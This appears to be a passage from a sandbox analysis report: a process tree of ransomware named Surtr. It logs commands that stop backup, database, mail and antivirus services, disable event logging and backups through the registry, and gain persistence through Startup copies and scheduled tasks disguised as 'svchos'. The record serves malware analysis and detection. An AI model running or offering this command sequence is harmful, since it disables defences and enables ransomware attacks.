- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MMS"
    3⤵
    PID:1812
  - - C:\Windows\system32\net.exe
      net stop "MMS"
      4⤵
      PID:1140
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MMS"
        5⤵
        
        PID:1164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
    3⤵
    PID:240
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
      4⤵
      PID:1200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
    3⤵
    PID:396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "mozyprobackup"
    3⤵
    PID:1168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MsDtsServer"
    3⤵
    PID:1628
  - - C:\Windows\system32\net.exe
      net stop "MsDtsServer"
      4⤵
      PID:1544
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MsDtsServer"
        5⤵
        
        PID:1076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MsDtsServer100"
    3⤵
    PID:1116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MsDtsServer110"
    3⤵
    PID:1848
  - - C:\Windows\system32\net.exe
      net stop "MsDtsServer110"
      4⤵
      PID:768
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MsDtsServer110"
        5⤵
        
        PID:220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSExchangeES"
    3⤵
    PID:1352
  - - C:\Windows\system32\net.exe
      net stop "MSExchangeES"
      4⤵
      PID:1492
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSExchangeES"
        5⤵
        
        PID:228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSExchangeIS"
    3⤵
    PID:204
  - - C:\Windows\system32\net.exe
      net stop "MSExchangeIS"
      4⤵
      PID:892
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSExchangeIS"
        5⤵
        
        PID:212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c mkdir "C:\ProgramData\Service"
    3⤵
    PID:612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c mkdir "%TEMP%\Service"
    3⤵
    PID:1832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSExchangeMGMT"
    3⤵
    PID:236
  - - C:\Windows\system32\net.exe
      net stop "MSExchangeMGMT"
      4⤵
      PID:1956
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSExchangeMGMT"
        5⤵
        
        PID:1624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSExchangeMTA"
    3⤵
    PID:1716
  - - C:\Windows\system32\net.exe
      net stop "MSExchangeMTA"
      4⤵
      PID:796
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta"
    3⤵
    - Drops startup file
    PID:1516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.txt" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt"
    3⤵
    - Drops startup file
    PID:1316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSExchangeSA"
    3⤵
    PID:1364
  - - C:\Windows\system32\net.exe
      net stop "MSExchangeSA"
      4⤵
      PID:1208
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSExchangeSA"
        5⤵
        
        PID:1112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSExchangeSRS"
    3⤵
    PID:564
  - - C:\Windows\system32\net.exe
      net stop "MSExchangeSRS"
      4⤵
      PID:824
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSExchangeSRS"
        5⤵
        
        PID:320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSOLAP$SQL_2008"
    3⤵
    PID:1368
  - - C:\Windows\system32\net.exe
      net stop "MSOLAP$SQL_2008"
      4⤵
      PID:592
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSOLAP$SQL_2008"
        5⤵
        
        PID:1092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSOLAP$SYSTEM_BGC"
    3⤵
    PID:1272
  - - C:\Windows\system32\net.exe
      net stop "MSOLAP$SYSTEM_BGC"
      4⤵
      PID:288
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSOLAP$SYSTEM_BGC"
        5⤵
        
        PID:432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSOLAP$TPS"
    3⤵
    PID:336
  - - C:\Windows\system32\net.exe
      net stop "MSOLAP$TPS"
      4⤵
      PID:1224
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSOLAP$TPS"
        5⤵
        
        PID:900
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSOLAP$TPSAMA"
    3⤵
    PID:1052
  - - C:\Windows\system32\net.exe
      net stop "MSOLAP$TPSAMA"
      4⤵
      PID:1804
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSOLAP$TPSAMA"
        5⤵
        
        PID:792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$BKUPEXEC"
    3⤵
    PID:1164
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$BKUPEXEC"
      4⤵
      PID:1556
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$BKUPEXEC"
        5⤵
        
        PID:688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%TEMP%\Service\Surtr.exe"
    3⤵
    PID:1488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$ECWDB2"
    3⤵
    PID:1796
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$ECWDB2"
      4⤵
      PID:1076
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$ECWDB2"
        5⤵
        
        PID:1544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Public_DATA.surt" "%TEMP%\Service\Public_DATA.surt"
    3⤵
    PID:1168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Private_DATA.surt" "%TEMP%\Service\Private_DATA.surt"
    3⤵
    PID:1180
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\ID_DATA.surt" "%TEMP%\Service\ID_DATA.surt"
    3⤵
    PID:1160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$PRACTICEMGT"
    3⤵
    PID:1116
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$PRACTICEMGT"
      4⤵
      PID:220
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$PRACTICEMGT"
        5⤵
        
        PID:1988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.hta" "%TEMP%\Service\SURTR_README.hta"
    3⤵
    PID:232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$PRACTTICEBGC"
    3⤵
    PID:1492
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$PRACTTICEBGC"
      4⤵
      PID:212
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$PRACTTICEBGC"
        5⤵
        
        PID:2016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.txt" "%TEMP%\Service\SURTR_README.txt"
    3⤵
    PID:1352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c attrib +R /S "C:\ProgramData\Service"
    3⤵
    PID:208
  - - C:\Windows\system32\attrib.exe
      attrib +R /S "C:\ProgramData\Service"
      4⤵
      Views/modifies file attributes
      PID:1192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$PROFXENGAGEMENT"
    3⤵
    PID:1752
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$PROFXENGAGEMENT"
      4⤵
      PID:680
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$PROFXENGAGEMENT"
        5⤵
        
        PID:2036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$SBSMONITORING"
    3⤵
    PID:816
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$SBSMONITORING"
      4⤵
      PID:1972
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$SBSMONITORING"
        5⤵
        
        PID:856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$SHAREPOINT"
    3⤵
    PID:864
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$SHAREPOINT"
      4⤵
      PID:1716
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$SHAREPOINT"
        5⤵
        
        PID:1152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c attrib +R /S "%TEMP%\Service"
    3⤵
    PID:1920
  - - C:\Windows\system32\attrib.exe
      attrib +R /S "C:\Users\Admin\AppData\Local\Temp\Service"
      4⤵
      Views/modifies file attributes
      PID:524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F
    3⤵
    PID:660
  - - C:\Windows\system32\schtasks.exe
      schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F
      4⤵
      Creates scheduled task(s)
      PID:1768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$SQL_2008"
    3⤵
    PID:636
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$SQL_2008"
      4⤵
      PID:1064
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$SQL_2008"
        5⤵
        
        PID:764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$SYSTEM_BGC"
    3⤵
    PID:1368
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$SYSTEM_BGC"
      4⤵
      PID:432
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$SYSTEM_BGC"
        5⤵
        
        PID:288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$TPS"
    3⤵
    PID:1272
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$TPS"
      4⤵
      PID:900
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$TPS"
        5⤵
        
        PID:1224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$TPSAMA"
    3⤵
    PID:336
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$TPSAMA"
      4⤵
      PID:792
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$TPSAMA"
        5⤵
        
        PID:1804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2008R2"
    3⤵
    PID:1052
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$VEEAMSQL2008R2"
      4⤵
      PID:1316
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2"
        5⤵
        
        PID:688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2012"
    3⤵
    PID:1556
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$VEEAMSQL2012"
      4⤵
      PID:1164
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2012"
        5⤵
        
        PID:1488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher"
    3⤵
    PID:1356
  - - C:\Windows\system32\net.exe
      net stop "MSSQLFDLauncher"
      4⤵
      PID:952
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLFDLauncher"
        5⤵
        
        PID:1220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$PROFXENGAGEMENT"
    3⤵
    PID:1184
  - - C:\Windows\system32\net.exe
      net stop "MSSQLFDLauncher$PROFXENGAGEMENT"
      4⤵
      PID:1048
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLFDLauncher$PROFXENGAGEMENT"
        5⤵
        
        PID:1088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SBSMONITORING"
    3⤵
    PID:768
  - - C:\Windows\system32\net.exe
      net stop "MSSQLFDLauncher$SBSMONITORING"
      4⤵
      PID:1160
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLFDLauncher$SBSMONITORING"
        5⤵
        
        PID:1988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SHAREPOINT"
    3⤵
    PID:220
  - - C:\Windows\system32\net.exe
      net stop "MSSQLFDLauncher$SHAREPOINT"
      4⤵
      PID:1116
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLFDLauncher$SHAREPOINT"
        5⤵
        
        PID:232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SQL_2008"
    3⤵
    PID:892
  - - C:\Windows\system32\net.exe
      net stop "MSSQLFDLauncher$SQL_2008"
      4⤵
      PID:1352
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLFDLauncher$SQL_2008"
        5⤵
        
        PID:2016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SYSTEM_BGC"
    3⤵
    PID:212
  - - C:\Windows\system32\net.exe
      net stop "MSSQLFDLauncher$SYSTEM_BGC"
      4⤵
      PID:1492
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLFDLauncher$SYSTEM_BGC"
        5⤵
        
        PID:2036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$TPS"
    3⤵
    PID:680
  - - C:\Windows\system32\net.exe
      net stop "MSSQLFDLauncher$TPS"
      4⤵
      PID:1752
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLFDLauncher$TPS"
        5⤵
        
        PID:856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$TPSAMA"
    3⤵
    PID:1972
  - - C:\Windows\system32\net.exe
      net stop "MSSQLFDLauncher$TPSAMA"
      4⤵
      PID:816
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLFDLauncher$TPSAMA"
        5⤵
        
        PID:1192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLSERVER"
    3⤵
    PID:208
  - - C:\Windows\system32\net.exe
      net stop "MSSQLSERVER"
      4⤵
      PID:524
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLSERVER"
        5⤵
        
        PID:1920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLServerADHelper100"
    3⤵
    PID:1152
  - - C:\Windows\system32\net.exe
      net stop "MSSQLServerADHelper100"
      4⤵
      PID:1716
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLServerADHelper100"
        5⤵
        
        PID:864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLServerOLAPService"
    3⤵
    PID:764
  - - C:\Windows\system32\net.exe
      net stop "MSSQLServerOLAPService"
      4⤵
      PID:1064
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLServerOLAPService"
        5⤵
        
        PID:636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MySQL80"
    3⤵
    PID:288
  - - C:\Windows\system32\net.exe
      net stop "MySQL80"
      4⤵
      PID:432
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MySQL80"
        5⤵
        
        PID:1368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MySQL57"
    3⤵
    PID:1224
  - - C:\Windows\system32\net.exe
      net stop "MySQL57"
      4⤵
      PID:900
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MySQL57"
        5⤵
        
        PID:1272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "OracleClientCache80"
    3⤵
    PID:1804
  - - C:\Windows\system32\net.exe
      net stop "OracleClientCache80"
      4⤵
      PID:792
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "OracleClientCache80"
        5⤵
        
        PID:336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "PDVFSService"
    3⤵
    PID:688
  - - C:\Windows\system32\net.exe
      net stop "PDVFSService"
      4⤵
      PID:1316
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "PDVFSService"
        5⤵
        
        PID:1052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "POP3Svc"
    3⤵
    PID:1488
  - - C:\Windows\system32\net.exe
      net stop "POP3Svc"
      4⤵
      PID:1164
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "POP3Svc"
        5⤵
        
        PID:1556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "ReportServer"
    3⤵
    PID:1220
  - - C:\Windows\system32\net.exe
      net stop "ReportServer"
      4⤵
      PID:952
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "ReportServer"
        5⤵
        
        PID:1356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "ReportServer$SQL_2008"
    3⤵
    PID:1088
  - - C:\Windows\system32\net.exe
      net stop "ReportServer$SQL_2008"
      4⤵
      PID:1048
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "ReportServer$SQL_2008"
        5⤵
        
        PID:1184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "ReportServer$SYSTEM_BGC"
    3⤵
    PID:1988
  - - C:\Windows\system32\net.exe
      net stop "ReportServer$SYSTEM_BGC"
      4⤵
      PID:1160
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "ReportServer$SYSTEM_BGC"
        5⤵
        
        PID:768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "ReportServer$TPS"
    3⤵
    PID:232
  - - C:\Windows\system32\net.exe
      net stop "ReportServer$TPS"
      4⤵
      PID:1116
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "ReportServer$TPS"
        5⤵
        
        PID:220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "ReportServer$TPSAMA"
    3⤵
    PID:2016
  - - C:\Windows\system32\net.exe
      net stop "ReportServer$TPSAMA"
      4⤵
      PID:1352
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "ReportServer$TPSAMA"
        5⤵
        
        PID:892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "RESvc"
    3⤵
    PID:2036
  - - C:\Windows\system32\net.exe
      net stop "RESvc"
      4⤵
      PID:1492
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "RESvc"
        5⤵
        
        PID:212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "sacsvr"
    3⤵
    PID:856
  - - C:\Windows\system32\net.exe
      net stop "sacsvr"
      4⤵
      PID:1752
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "sacsvr"
        5⤵
        
        PID:680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SamSs"
    3⤵
    PID:1192
  - - C:\Windows\system32\net.exe
      net stop "SamSs"
      4⤵
      PID:816
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SamSs"
        5⤵
        
        PID:1972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SAVAdminService"
    3⤵
    PID:1920
  - - C:\Windows\system32\net.exe
      net stop "SAVAdminService"
      4⤵
      PID:524
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SAVAdminService"
        5⤵
        
        PID:208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SAVService"
    3⤵
    PID:864
  - - C:\Windows\system32\net.exe
      net stop "SAVService"
      4⤵
      PID:1716
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SAVService"
        5⤵
        
        PID:1152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Smcinst"
    3⤵
    PID:636
  - - C:\Windows\system32\net.exe
      net stop "Smcinst"
      4⤵
      PID:1064
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Smcinst"
        5⤵
        
        PID:764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SmcService"
    3⤵
    PID:1368
  - - C:\Windows\system32\net.exe
      net stop "SmcService"
      4⤵
      PID:432
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SmcService"
        5⤵
        
        PID:288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SMTPSvc"
    3⤵
    PID:1272
  - - C:\Windows\system32\net.exe
      net stop "SMTPSvc"
      4⤵
      PID:900
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SMTPSvc"
        5⤵
        
        PID:1224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SNAC"
    3⤵
    PID:336
  - - C:\Windows\system32\net.exe
      net stop "SNAC"
      4⤵
      PID:792
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SNAC"
        5⤵
        
        PID:1804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SntpService"
    3⤵
    PID:1052
  - - C:\Windows\system32\net.exe
      net stop "SntpService"
      4⤵
      PID:1316
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SntpService"
        5⤵
        
        PID:688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "sophossps"
    3⤵
    PID:1556
  - - C:\Windows\system32\net.exe
      net stop "sophossps"
      4⤵
      PID:1164
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "sophossps"
        5⤵
        
        PID:1488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$BKUPEXEC"
    3⤵
    PID:1356
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$BKUPEXEC"
      4⤵
      PID:952
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$BKUPEXEC"
        5⤵
        
        PID:1220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
    3⤵
    PID:1184
  - - C:\Windows\system32\schtasks.exe
      schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
      4⤵
      Creates scheduled task(s)
      PID:1048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$ECWDB2"
    3⤵
    PID:1088
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$ECWDB2"
      4⤵
      PID:1500
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$ECWDB2"
        5⤵
        
        PID:1848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$PRACTTICEBGC"
    3⤵
    PID:1204
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$PRACTTICEBGC"
      4⤵
      PID:224
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$PRACTTICEBGC"
        5⤵
        
        PID:228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$PRACTTICEMGT"
    3⤵
    PID:1956
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$PRACTTICEMGT"
      4⤵
      PID:216
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$PRACTTICEMGT"
        5⤵
        
        PID:612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$PROFXENGAGEMENT"
    3⤵
    PID:796
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$PROFXENGAGEMENT"
      4⤵
      PID:388
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$PROFXENGAGEMENT"
        5⤵
        
        PID:236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SBSMONITORING"
    3⤵
    PID:204
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$SBSMONITORING"
      4⤵
      PID:1624
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$SBSMONITORING"
        5⤵
        
        PID:1516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SHAREPOINT"
    3⤵
    PID:1208
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$SHAREPOINT"
      4⤵
      PID:1648
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$SHAREPOINT"
        5⤵
        
        PID:1832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SQL_2008"
    3⤵
    PID:592
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$SQL_2008"
      4⤵
      PID:1364
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$SQL_2008"
        5⤵
        
        PID:1112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe"
    3⤵
    - Drops startup file
    PID:1704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SYSTEM_BGC"
    3⤵
    PID:528
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$SYSTEM_BGC"
      4⤵
      PID:1420
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$SYSTEM_BGC"
        5⤵
        
        PID:472
  - - C:\Windows\system32\net.exe
      net stop "SQLWriter"
      4⤵
      PID:1704
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLWriter"
        5⤵
        
        PID:396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$TPS"
    3⤵
    PID:564
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$TPS"
      4⤵
      PID:824
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$TPS"
        5⤵
        
        PID:396
- - C:\Windows\system32\cmd.exe
